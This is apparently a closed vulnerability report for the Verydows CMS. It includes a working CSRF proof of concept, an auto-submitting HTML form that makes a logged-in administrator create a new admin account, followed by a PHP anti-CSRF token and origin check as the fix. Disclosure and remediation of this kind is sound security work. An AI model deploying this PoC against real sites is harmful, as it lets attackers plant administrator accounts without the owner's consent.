Closed
Description
A CSRF vulnerability was found in this CMS.
A logged-in administrator user may add another administrator account by clicking the following PoC:
<form action="http://thewind/verydows/index.php?m=backend&c=admin&a=add&step=submit" id="test" method="post">
<!--Change the url when testing!-->
<!-- The fields below mirror the backend "add admin" form; note there is no anti-CSRF token field, so the browser's session cookie alone authorises the request -->
<input type="text" name="username" value="TomAPU" />
<input type="text" name="password" value="123456" />
<input type="text" name="resetpwd" value="1" />
<input type="text" name="repassword" value="123456" />
<input type="text" name="name" value="TomAPU" />
<input type="text" name="email" value="admin@pornhub.com" />
</form>
<script>
// Submit the form automatically as soon as the page loads
var f = document.getElementById("test");
f.submit();
</script>
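The fix on the server side is to refuse state-changing backend requests that do not carry a per-session anti-CSRF token. The following is an added example of such a check, not verydows code; the function names, the `_csrf` field name, the session key and the `http://thewind` origin are assumptions chosen to match the PoC above.

```php
<?php
// Added example (not verydows code): synchronizer-token CSRF defence for a
// state-changing backend action such as admin/add with step=submit.
// Assumes session_start() has already run for the logged-in administrator.

const CSRF_SESSION_KEY = '_csrf_token';

// Issue (or reuse) a per-session token; call this when rendering the add-admin form.
function csrf_token(): string
{
    if (empty($_SESSION[CSRF_SESSION_KEY])) {
        $_SESSION[CSRF_SESSION_KEY] = bin2hex(random_bytes(32));
    }
    return $_SESSION[CSRF_SESSION_KEY];
}

// Hidden field for the legitimate form, so only pages served by this site can
// include the token. A cross-site page like the PoC cannot read it.
function csrf_field(): string
{
    return '<input type="hidden" name="_csrf" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Verify a submission: constant-time token comparison plus an Origin/Referer
// check. The PoC sends no token and its Origin is the attacker's page, so it
// fails both checks and the account is never created.
function csrf_request_is_valid(array $post, array $server, string $siteOrigin): bool
{
    $expected = $_SESSION[CSRF_SESSION_KEY] ?? '';
    $given    = $post['_csrf'] ?? '';
    if ($expected === '' || !is_string($given) || !hash_equals($expected, $given)) {
        return false;
    }
    // Browsers attach Origin (or at least Referer) to cross-site form POSTs;
    // compare the full scheme://host[:port] rather than a string prefix.
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $parts  = parse_url($source);
    if (!is_array($parts) || empty($parts['scheme']) || empty($parts['host'])) {
        return false;
    }
    $sourceOrigin = $parts['scheme'] . '://' . $parts['host']
        . (isset($parts['port']) ? ':' . $parts['port'] : '');
    return $sourceOrigin === $siteOrigin;
}

// In the controller, before touching the database (assumed call site):
// if (($_GET['step'] ?? '') === 'submit'
//     && !csrf_request_is_valid($_POST, $_SERVER, 'http://thewind')) {
//     http_response_code(403);
//     exit('invalid CSRF token');
// }
```

Setting the session cookie with `SameSite=Lax` or `Strict` in `session_set_cookie_params()` adds a second, browser-enforced layer, but the token check is what makes the endpoint safe regardless of client.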